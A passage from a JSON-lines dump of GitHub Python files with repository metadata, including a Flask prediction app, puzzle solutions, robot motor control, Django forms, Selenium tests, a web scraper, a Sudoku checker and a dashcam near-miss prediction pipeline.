np.array(data).reshape(1,-1)\r\n predict = model.predict(input)\r\n return render_template('home.html',predictValue = predict)\r\n # return render_template('output.html',predictValue = 1)\r\n\r\n\r\nif (__name__ == '__main__'):\r\n app.run(host='0.0.0.0',port=8080)","repo_name":"kumarsatwik25/end-to-end-ml-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3680717253","text":"def read_input(filename):\n with open(filename) as file:\n content = file.readlines()\n content = [line.rstrip() for line in content]\n return content\n\nfilename = 'day13p1.txt'\n\ntime, buses = read_input(filename)\ntime = int(time)\nbuses = [int(bus) for bus in buses.split(',') if not bus == 'x']\n\nstarts = [(time // bus) * bus + bus for bus in buses]\nstarts_buses = zip(starts, buses)\nsoonest = min(starts_buses, key=lambda p: p[0])\nprint((soonest[0] - time) * soonest[1])\n","repo_name":"kencole/advent_of_code_2020","sub_path":"day13p1.py","file_name":"day13p1.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71322226041","text":"#Importing numpy\nimport numpy as np\n\n#filehandler object\nfile = open('numbers.txt', 'w+')\n\nl = [478, 256, 345, 231, 246, 781]\n\n#loop to write in file\nfor num in l:\n\tfile.write(str(num)+'\\n')\nfile.close()\n\nfile2 = open('numbers.txt','r')\nl2 = []\nfor line in file2:\n\tl2.append(int(line))\nfile2.close()\n\n#outputing the final result\nprint('Mean of Numbers: {0} \\nStandard Deviation of Numbers: {1}'.format(sum(l2)/len(l2), np.std(l2)))\n","repo_name":"ashsek/Competetive-Codes","sub_path":"Code Chef/mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19068644277","text":"#!/usr/bin/env python3\n# Run the motors\n# Based on: https://github.com/mcdeoliveira/rcpy/raw/master/examples/rcpy_test_motors.py\n# import python libraries\n\nimport rcpy\nimport rcpy.motor as motor\nimport sys\nimport time\n\nclass Manual:\n \n # CONSTANT VARIABLES #\n # CONTROL CONSTANTS #\n BACKWARD = \"\\033[B\" # Down\n FORWARD = \"\\033[A\" # Up\n KILLSWITCH = \"^C\" # Select\n LEFT = \"\\033[D\" # Left\n RIGHT = \"\\033[C\" # Right\n SELECT_MODE = \"3\" # Start / Pause\n THROTTLE_DOWN = \"4\" # Left Trigger\n THROTTLE_UP = \"6\" # Right Trigger\n \n # THROTTLE CONSTANTS (Forward and Backward) #\n DIRECTION_THROTTLE_BACKWARD = -1 # Negative to go backward\n DIRECTION_THROTTLE_FORWARD = 1 # Positive to go forward\n DIRECTION_THROTTLE_DEFAULT = DIRECTION_THROTTLE_FORWARD # The direction to start travelling in\n DUTY_THROTTLE_MAX = 1.0 # Max duty allowed for throttle\n DUTY_THROTTLE_STEPS = 10 # Number of 'gears' to max throttle\n DUTY_THROTTLE_ITERATION_VALUE = DUTY_THROTTLE_MAX / DUTY_THROTTLE_STEPS\n \n # TURN CONSTANTS (Left and Right) #\n DIRECTION_TURN_CENTER = 0 # Directional value to keep wheels straight\n DIRECTION_TURN_DEFAULT = DIRECTION_TURN_CENTER # The direction the wheels start in\n DIRECTION_TURN_LEFT = 1 # Directional value to turn wheels towards the left\n DIRECTION_TURN_RIGHT = -1 # Directional value to turn wheels towards the right\n DUTY_TURN_MAX = 1.0 # Max duty allowed for turning\n DUTY_TURN_STEPS = 30 # Number of steps before reaching max turn radius\n DUTY_TURN_ITERATION_VALUE = DUTY_TURN_MAX / DUTY_TURN_STEPS\n\n # CONSTRUCTOR #\n def __init__(self):\n self.direction = self.DIRECTION_THROTTLE_DEFAULT\n self.direction_turn = self.DIRECTION_TURN_DEFAULT\n self.duty_throttle = 0\n self.duty_turn = 0\n rcpy.set_state(rcpy.RUNNING)\n print(\"Manual Initiated.\")\n \n def change_direction(self, direction):\n if abs(direction) == 1: # Check if direction is either 1 or -1\n self.duty_throttle = 0 # Stop first\n self.direction = direction\n \n def check_hold(self, direction):\n if abs(direction) == 1 or direction == 0: # Check if direction is either 1, -1 or 0\n if self.direction_turn != direction: # If the input direction doesn't match the previously chosen...\n self.direction_turn = direction # ...change to new direction\n self.duty_turn = 0 # and reset the turn duty\n \n def decrease_throttle(self):\n if self.duty_throttle >= self.DUTY_THROTTLE_ITERATION_VALUE: # Check if duty is at least what will be subtracted\n self.duty_throttle = self.duty_throttle - self.DUTY_THROTTLE_ITERATION_VALUE # Iterate negatively\n else: # Duty is less than iteration value\n self.duty_throttle = 0 # Set duty to min\n\n def increase_throttle(self):\n if self.duty_throttle <= self.DUTY_THROTTLE_MAX - self.DUTY_THROTTLE_ITERATION_VALUE: # Check if duty is at most one iteration from max\n self.duty_throttle = self.duty_throttle + self.DUTY_THROTTLE_ITERATION_VALUE #Iterate Positively\n else: # Duty is greater than one iteration from max\n self.duty_throttle = self.DUTY_THROTTLE_MAX # Set duty to max\n\n def get_duty_throttle(self):\n return self.duty_throttle * self.direction # Return duty in the current direction\n \n def get_duty_turn(self):\n return self.duty_turn * self.direction_turn # Return duty in the current direction\n \n def kill(self):\n self.direction = 1\n self.direction_turn = 0\n self.duty_throttle = 0\n self.duty_turn = 0\n motor.set(1, 0)\n motor.set(2, 0)\n print(\"Killswitch activated.\")\n \n def read_key(self):\n key = sys.stdin.read(1)\n if ord(key) == 27:\n key = key + sys.stdin.read(2)\n elif ord(key) == 3:\n raise KeyboardInterrupt \n return key\n \n def turning(self, key):\n # TODO: Use 'keyboard' module to read multiple keys at once\n if (key == self.LEFT) ^ (key == self.RIGHT): # If keystrokes contain -EITHER- LEFT or RIGHT...\n if key == self.LEFT: # If it's LEFT\n self.check_hold(self.DIRECTION_TURN_LEFT)\n else: # If it's RIGHT\n self.check_hold(self.DIRECTION_TURN_RIGHT)\n \n if self.duty_turn <= self.DUTY_TURN_MAX - self.DUTY_TURN_ITERATION_VALUE: # If the next iteration is at most one iteration from max duty...\n self.duty_turn = self.duty_turn + self.DUTY_TURN_ITERATION_VALUE # Iterate\n else: # Value is greater than one iteration away from max duty\n self.duty_turn = self.DUTY_TURN_MAX # Set duty to its max value\n else: # Neither or both directions selected\n self.check_hold(self.DIRECTION_TURN_CENTER) # Set direction to straight and reset duty\n \ntry:\n m = Manual()\n\n m.change_direction(m.DIRECTION_THROTTLE_BACKWARD)\n m.increase_throttle()\n \n while rcpy.get_state() != rcpy.EXITING:\n \n m.turning(m.LEFT)\n motor.set(1, m.get_duty_turn())\n motor.set(2, m.get_duty_throttle())\n \n time.sleep(.1) # sleep some\n\nexcept KeyboardInterrupt:\n m.kill()\n pass\n \nfinally:\n print(\"\\nBye BeagleBone!\")","repo_name":"jadonk/BlueDonkey-old","sub_path":"experiments/motors.py","file_name":"motors.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"27896785804","text":"from django import forms\nfrom django.contrib.auth import password_validation\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth.models import User\nfrom .models import User_information\nfrom django.contrib.auth.views import LoginView\nfrom accounts.utils import COUNTRIES, UndergraduateDegreeChoice, CampusChoice\n\nclass SignUpForm(UserCreationForm):\n username = forms.CharField(\n label='Nombre de usuario',\n help_text='Requerido. 150 caracteres o menos. Letras, dígitos y @/./+/-/_ solamente.', \n max_length=152,\n required=True, \n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Username', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n\n email = forms.CharField(\n label=\"Correo electrónico\",\n max_length=254, \n required=True, \n widget=forms.EmailInput(attrs={'class': \"form-control\", 'placeholder': 'info@example.com', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n \n password1 = forms.CharField(\n label=\"Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n help_text=password_validation.password_validators_help_text_html(),\n )\n\n password2 = forms.CharField(\n label=\"Confirma Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password Confirmation', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n help_text=\"Ingrese la misma contraseña para verificación.\",\n )\n \n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\nclass LoginForm(LoginView):\n username = forms.CharField(\n label='Nombre de usuario',\n max_length=152,\n required=True, \n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Username', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n \n password1 = forms.CharField(\n label=\"Contraseña\",\n strip=False,\n widget=forms.PasswordInput(attrs={'class': \"form-control\", 'placeholder': 'Password', 'style': 'background-color: rgba(73, 80, 87, 0.1)'}),\n )\n\n class Meta:\n model = User\n fields = ('username', 'password')\n\n\nclass EditUserDataForm(forms.ModelForm):\n First_name = forms.CharField(\n label='Primer Nombre', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Primer Nombre', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu nombre.'},\n )\n\n Middle_name = forms.CharField(\n label='Segundo Nombre', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Segundo Nombre', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu segundo nombre.'},\n )\n\n Last_name = forms.CharField(\n label='Apellido', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Apellido', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu apellido.'},\n )\n\n Age = forms.IntegerField(\n label='Edad', \n required=True,\n widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': '18', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu edad.'},\n min_value=18,\n max_value=105,\n )\n\n Mobile = forms.CharField(\n label='Número de Teléfono', \n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '581234567890', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu número telefónico.'},\n help_text=\"Ingresa tu número de teléfono sin guiones (-) ni más (+)\",\n )\n\n Birthdate = forms.DateField(\n label='Fecha de Nacimiento', \n required=True,\n widget=forms.DateInput(attrs={'class': \"form-control \",'type':'date', 'placeholder': '581234567890', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu fecha de nacimiento.'},\n help_text=\"Utilice la ventana desplegable para seleccionar su fecha.\",\n )\n\n Mailing_city = forms.CharField(\n label='Ciudad', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Ciudad', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu ciudad de envío de correo.'},\n )\n\n Mailing_state = forms.CharField(\n label='Estado', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Estado', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu estado de envío de correo.'},\n )\n\n Mailing_country = forms.ChoiceField(\n label='País', \n required=True,\n widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu país de envío de correo.'},\n choices=COUNTRIES,\n )\n\n USB_alumn = forms.BooleanField(\n label='Estudiante de la USB', \n required=True,\n error_messages={'required': 'Por favor ingresa si eres o no estudiantes de la USB.'},\n )\n\n Cohorte = forms.IntegerField(\n label='Cohorte', \n required=True,\n widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': '00', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu cohorte.'},\n min_value=0,\n max_value=99,\n help_text=\"Por ingrese solamente el número de su cohorte (sin carnet).\",\n )\n\n Carnet = forms.IntegerField(\n label='Carnet', \n required=True,\n widget=forms.NumberInput(attrs={'class': \"form-control\", 'placeholder': '10000', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu carnet.'},\n min_value=10000,\n max_value=15000,\n help_text=\"Por ingrese solamente el número de su carnet (sin cohorte).\",\n )\n\n Undergrad_degree = forms.ChoiceField(\n label='Pregrado', \n required=True,\n widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu título de pregrado.'},\n choices=[(tag.name, tag.value) for tag in UndergraduateDegreeChoice],\n )\n\n USB_undergrad_campus = forms.ChoiceField(\n label='Campus Pregrado USB', \n required=True,\n widget=forms.Select(attrs={'class': \"form-control dropdown\", 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa el campus de la universidad de tu pregrado.'},\n choices=[(tag.name, tag.value) for tag in CampusChoice],\n )\n\n Graduate_degree = forms.CharField(\n label='Maestría', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Maestría', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa tu título de maestría, si no tienes puedes colocar \"None\".'},\n )\n\n Graduate_campus = forms.CharField(\n label='Campus Maestría', \n max_length=30,\n required=True,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Campus Maestría', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n error_messages={'required': 'Por favor ingresa el campus de la universidad de maestría, si no tienes puedes colocar \"None\".'},\n )\n\n Workplace = forms.CharField(\n label='Lugar de Trabajo', \n max_length=30,\n required=False,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': 'Boston', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n )\n\n Work_email = forms.CharField(\n label=\"Correo electrónico de trabajo\",\n max_length=60, \n required=False, \n widget=forms.EmailInput(attrs={'class': \"form-control\", 'placeholder': 'info@example.com', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n )\n\n Donor = forms.BooleanField(\n label='Donante recurrente', \n required=True,\n error_messages={'required': 'Por favor ingresa si eres o no donante recurrent en AlumnUSB.'},\n )\n\n Social_networks = forms.CharField(\n label='Redes sociales', \n max_length=60,\n required=False,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n )\n\n Twitter_account = forms.CharField(\n label='Twitter', \n max_length=60,\n required=False,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n )\n\n Instagram_account = forms.CharField(\n label='Instagram', \n max_length=60,\n required=False,\n widget=forms.TextInput(attrs={'class': \"form-control\", 'placeholder': '@MiRedSocial', 'style': 'background-color: rgba(233, 229, 200, 0.5)'}),\n )\n\n class Meta:\n model = User_information\n fields = (\n 'First_name',\n 'Middle_name',\n 'Last_name',\n 'Age',\n 'Mobile',\n 'Birthdate',\n 'Mailing_city',\n 'Mailing_state',\n 'Mailing_country',\n 'USB_alumn',\n 'Cohorte',\n 'Carnet',\n 'Undergrad_degree',\n 'USB_undergrad_campus',\n 'Graduate_degree',\n 'Graduate_campus',\n 'Workplace',\n 'Work_email',\n 'Donor',\n 'Social_networks',\n 'Twitter_account',\n 'Instagram_account'\n )\n\n\nclass getUserDataForm(forms.ModelForm):#UserChangeForm):\n \"\"\"docstring for EditUserData\"\"\"\n #message = forms.CharField(widget=forms.Textarea(), max_length=4000)\n\n class Meta:\n model = User_information\n fields = (\n 'First_name',\n 'Middle_name',\n 'Last_name',\n 'Mailing_city',\n 'Mailing_state',\n 'USB_alumn',\n #'Codigo_Alumn_USB',\n 'Mailing_country',\n #'Email',\n 'Mobile',\n 'Cohorte',\n 'Birthdate',\n 'Age',\n 'Undergrad_degree',\n 'Graduate_degree',\n 'Carnet',\n 'USB_undergrad_campus',\n 'Graduate_campus',\n 'Work_email',\n 'Workplace',\n 'Donor',\n 'Social_networks',\n 'Twitter_account',\n 'Instagram_account'\n )\n\nclass pictureId(forms.Form):\n Pic_id = forms.IntegerField()","repo_name":"manuelguillegil/alumnusb-system","sub_path":"alumnusb_system/accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8767375283","text":"import requests\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python script.py <repository_name> <owner_name>\")\n sys.exit(1)\n\nrepository_name = sys.argv[1]\nowner_name = sys.argv[2]\n\nurl = f'https://api.github.com/repos/{owner_name}/{repository_name}/commits'\nparams = {'per_page': 10}\n\ntry:\n response = requests.get(url, params=params)\n response.raise_for_status() # Raise an HTTPError for bad responses (4xx and 5xx)\n\n commits = response.json()\n\n for commit in commits:\n sha = commit['sha']\n author_name = commit['commit']['author']['name']\n print(f\"{sha}: {author_name}\")\n\nexcept requests.exceptions.HTTPError as e:\n print(\"Error code:\", e.response.status_code)\nexcept requests.exceptions.RequestException as e:\n print(\"Error:\", e)\nexcept ValueError:\n print(\"Not a valid JSON\")\n","repo_name":"YASSINEBOUTAYEB1/alx-higher_level_programming","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9357305804","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nimport sys\n\nURL = \"https://www.campuscatalog.me/housing/\"\n\n\nclass Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n chrome_options = Options()\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--disable-extensions\")\n cls.driver = webdriver.Chrome(PATH, options=chrome_options)\n cls.driver.get(URL)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n def testSort(self):\n self.driver.get(URL)\n self.driver.implicitly_wait(10)\n self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/thead/tr/th[1]\"\n ).click()\n self.driver.implicitly_wait(10)\n housing = self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/tbody/tr[1]/td[1]/a\"\n )\n\n assert housing.text == \"05 Buckhead\"\n\n def testFilter(self):\n self.driver.get(URL)\n self.driver.implicitly_wait(10)\n self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/div[1]/div/div/button\"\n ).click()\n city_filter = self.driver.find_element(\n By.XPATH, \"/html/body/div[2]/div[3]/div[2]/form/div/div/input\"\n )\n city_filter.send_keys(\"Austin\")\n self.driver.find_element(\n By.XPATH, \"/html/body/div[2]/div[2]/div/button\"\n ).click()\n self.driver.implicitly_wait(10)\n\n housing = self.driver.find_element(\n By.XPATH, \"/html/body/div/div[2]/div/table/tbody/tr[1]/td[1]/a\"\n )\n\n assert housing.text == \"Rhythm\"\n\n def testHousingInstance(self):\n self.driver.get(\"https://www.campuscatalog.me/housing/d2qz44k2/\")\n self.driver.implicitly_wait(20)\n name = self.driver.find_element(By.CLASS_NAME, \"Apartment_Name__Qv9vF\").text\n assert name == \"Gather Oxford\"\n address = self.driver.find_element(\n By.CLASS_NAME, \"Apartment_Location__1Vfrq\"\n ).text\n assert address == \"Oxford, 207 Hathorn Rd\"\n\n\nif __name__ == \"__main__\":\n PATH = sys.argv[1]\n unittest.main(argv=[\"first-arg-is-ignored\"])\n","repo_name":"ameer886/Campus-Catalog","sub_path":"front-end/src/gui_tests/housing_tests.py","file_name":"housing_tests.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5714583209","text":"import bs4\nfrom urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup \n\n# website url for scraping\nmy_url = 'https://www.stillwhite.com/backless-wedding-dresses?size=4&size=6&price=0-1500&back=1&page=1&listing=199026'\n\n# opening connection, grabbing the page\nuClient = uReq(my_url)\npage_html = uClient.read()\nuClient.close()\n\n# html parsing\npage_soup = soup(page_html, \"html.parser\")\n\n# grabs heach product\ncontainers = page_soup.findAll(\"li\", {\"data-page\":\"1\"})\n\n# initiate .csv file open and write\nfilename = \"products.csv\"\nf = open(filename, \"w\")\nheaders = \"brand, price, size, percent_savings, item_link\\n\"\nf.write(headers)\n \nfor container in containers:\n #\n title_container = container.findAll(\"div\",{\"class\":\"item-title-heading\"})\n brand_name = title_container[0].text\n #\n price_container = container.findAll(\"div\",{\"class\":\"item-title-price\"})\n item_price = price_container[0].text\n #\n size_container = container.findAll(\"small\",{\"class\":\"text-muted\"}) \n item_size = size_container[0].text.strip()\n for i in range(6):\n size_value = item_size[i]\n i += 1\n # \n percentage_savings = item_size[-3:]\n percent_comparison = \"%\"\n if percentage_savings[-1] != \"%\":\n percentage_savings = \"N/A\"\n #\n link_container = container.a.text\n link_container_test = container.a[\"href\"]\n #\n f.write(brand_name + \",\" + item_price.replace(\",\",\"'\") + \",\" + size_value + \",\" + percentage_savings + \",\" + \"https://www.stillwhite.com/\" + link_container_test + \"\\n\")\n \nf.close()\nprint(\"Check products.csv folder in direcotry for latest scrape!\")\n\n# pronto testing kit\n\"\"\"\nprint(\"brand: \" + brand_name)\nprint(\"price: \" +item_price)\nprint(\"size: \" + size_value)\nprint(\"percent. savings: \" + percentage_savings)\nprint(\"https://www.stillwhite.com/\" + link_container_test)\n\"\"\"\n","repo_name":"johnbeni93/web-scraper-app","sub_path":"my_first_webscrape.py","file_name":"my_first_webscrape.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9922221880","text":"'''program to check complete Sudoku grid\r\nnasreen hoosain\r\n11/05/14''' \r\n\r\n#function to check the grid \r\ndef check(grid):\r\n for l in grid:\r\n l.sort() #sort in numerical order\r\n if l[0] != '1': #if first number is not one\r\n return False\r\n elif l[8] != '9': #if first number is not 9\r\n return False\r\n else: # check if two same numbers next to each other\r\n for i in range(8):\r\n if l[i] == l[i+1]:\r\n return False\r\n else:\r\n return True\r\n \r\nif __name__ == '__main__':\r\n \r\n grid = []\r\n for row in range (9):\r\n x = input()\r\n grid.append(x) \r\n\r\n #get rows\r\n rows = []\r\n for j in range(9):\r\n row = []\r\n for i in range(9):\r\n row.append(grid[j][i])\r\n rows.append(row)\r\n \r\n #get columns\r\n cols = []\r\n for i in range(9):\r\n c = []\r\n for j in range(9):\r\n x = rows[j][i]\r\n c.append(x)\r\n cols.append(c) \r\n \r\n #get blocks\r\n blocks = []\r\n for i in range(9):\r\n b = []\r\n for j in range(9):\r\n x = rows[3*(i//3) + j//3][3*(i%3) + j%3] #put 3x3 blocks in row\r\n b.append(x)\r\n blocks.append(b) \r\n\r\n #check rows, columns and blocks\r\n if check(rows) == True and check(cols) == True and check(blocks) == True:\r\n print('Sudoku grid is valid')\r\n else:\r\n print('Sudoku grid is not valid')","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/hsnnas006/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7462757637","text":"# from setup import SettingEnvironment\n# SettingEnvironment()\nfrom pathlib import Path\nfrom Yolov7ObjectTracking.detect_and_track import *\nfrom SpeedETool import *\nfrom RVPextract import *\nimport json\nimport cv2\nimport time\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--folderpath', help='')\nparser.add_argument('--videopath', help='')\nparser.add_argument('--KML_file_path', help='')\nparser.add_argument('--vnp_det_option', type=int, default=0, help='0-Deephough, 1-RVNP')\n\nparser.add_argument('--FOV_horizontal', type=int, default=110, help='')\nparser.add_argument('--FOV_vertical', type=int, default=70, help='')\nparser.add_argument('--CameraHeight', type=float, default=2.0, help='')\n\nparser.add_argument('--ImageWidth', type=float, default=1280, help='')\nparser.add_argument('--ImageHeight', type=float, default=720, help='')\nargs = parser.parse_args()\n\ndef makeJson(frame_count, data, risk_json_path):\n datajson = {}\n f = open(data)\n data = json.load(f)\n\n for i in range(frame_count): \n frame_info = []\n risk1s, risk3s, risk10s = [], [], []\n\n risk_obj_1s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_1s']]\n for id in risk_obj_1s:\n for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n if (obj['id'] == id):\n risk1s.append({'id':id, 'object_location':obj['object_location']})\n \n risk_obj_3s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_3s']]\n for id in risk_obj_3s:\n for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n if (obj['id'] == id):\n risk3s.append({'id':id, 'object_location':obj['object_location']})\n \n risk_obj_10s = [int(obj_id) for obj_id in data['FrameInfo'][0][f'frame{i}'][0]['Risk_Object_10s']]\n for id in risk_obj_10s:\n for obj in data['FrameInfo'][0][f'frame{i}'][0]['Object']:\n if (obj['id'] == id):\n risk10s.append({'id':id, 'object_location':obj['object_location']})\n\n frame_info.append({'risk1s':risk1s, 'risk3s':risk3s, 'risk10s':risk10s})\n \n datajson[f'frame{i}'] = frame_info\n\n save_file = open(risk_json_path, \"w\") \n json.dump(datajson, save_file) \n \n print('save file to risk.json')\n\nif __name__ == '__main__':\n tstart = time.time()\n # Input\n folderpath = args.folderpath\n videopath = args.videopath\n KML_file_path = args.KML_file_path\n FOV_hor, FOV_ver, CamHeight = args.FOV_horizontal, args.FOV_vertical, args.CameraHeight\n ImageWidth = args.ImageWidth\n ImageHeight = args.ImageHeight\n vnp_det_option = args.vnp_det_option\n\n folder_name = folderpath + '/FullFrame'\n path = Path(folder_name)\n\n if path.exists() and path.is_dir():\n print(folder_name, 'is exists')\n else:\n path.mkdir()\n\n print('Set up Finished')\n \n frame_interval = 3\n # Result\n vnp_output_path = folderpath + '/vnp.txt'\n json_file_path = folderpath + '/output.json'\n veclocity_path = folderpath + '/velocity.txt'\n risk_json_path = folderpath + '/risk.json'\n video_path = folderpath + '/video.mp4'\n\n print('\\nVIDEO PATH: ', folderpath)\n print('\\nSAVE RESULT TO FOLDER: ', folderpath)\n print('\\n====================================================\\n')\n print('Save VNP txt to : ', vnp_output_path)\n \n fps, frame_count = 14, 224\n \n t00 = time.time()\n \n if vnp_det_option == 0:\n from vnp import MakeInput\n fps, frame_count = MakeInput(folderpath, vnp_output_path, videopath, frame_interval, stage=2)\n \n elif vnp_det_option == 1:\n scale = 0.65\n extractor = MVextractor(videopath, frame_interval, scale)\n extractor.R_VP_detection(vnp_output_path, 0)\n \n #fill non detected with nearest vnp\n raw_data = read_data_from_file(vnp_output_path)\n data = organize_data(raw_data, extractor.frame_count)\n write_result_to_file(data, vnp_output_path)\n\n fps, frame_count = extractor.fps, extractor.frame_count\n \n t01 = time.time()\n print(fps, frame_count)\n\n # print('\\n====================================================\\n')\n # print('KML File process, save velocity to: ', veclocity_path)\n # VelocityExtract(veclocity_path, KML_file_path, fps)\n \n print('\\n====================================================\\n')\n print('Trajectory, save metadata to: ', json_file_path)\n print('\\n====================================================\\n')\n ins_matrix_info = [[FOV_hor, FOV_ver], CamHeight]\n t10 = time.time()\n TrajectoryAndMakingVideo(videopath, vnp_output_path, veclocity_path, json_file_path, fps, (ImageHeight, ImageWidth), ins_matrix_info, frame_interval) \n t11 = time.time()\n\n t20 = time.time()\n risk_json_file = makeJson(frame_count, json_file_path, risk_json_path)\n t21 = time.time()\n tend = time.time()\n print('\\n----------------------------------------')\n print('Frame skip: ', frame_interval)\n print('----------------------------------------')\n print('Total: ', tend - tstart)\n print('Frame Extract + Deephough: \\t', t01 - t00)\n print('Tracjectory: \\t', t11 - t10)\n print('Json generation: \\t', t21 - t20)\n print('----------------------------------------')\n print('FPS: ', round(frame_count/(tend - tstart),2))","repo_name":"keeganhuynh/Near-miss-accident-prediction-using-dashcam-videos","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6594923213","text":"import urllib.request\nimport json\nimport time\n\n# def fetch_record_info(record_url):\n# with urllib.request.urlopen(record_url) as result:\n#\n#\n# records_url = 'https://esgf-node.llnl.gov/esg-search/search/?experiment_id=ssp126&variable_id=siflswdtop&offset=0&limit=9999&type=Dataset&replica=false&latest=true&project=CMIP6&format=application%2Fsolr%2Bjson'\n#\n# with urllib.request.urlopen(records_url) as result_search:\n# data = json.loads(result_search.read().decode())\n# file_urls_to_download = data['response']['docs']\n#\n# for file_url_to_download in file_urls_to_download:\n# fetch_record_info(file_url_to_download)\n\ndef url_open_retry(url, retries = 0, retry_interval = 10):\n result = None\n for i in range(0, retries):\n try:\n result = urllib.request.urlopen(url)\n except:\n print('retrying')\n 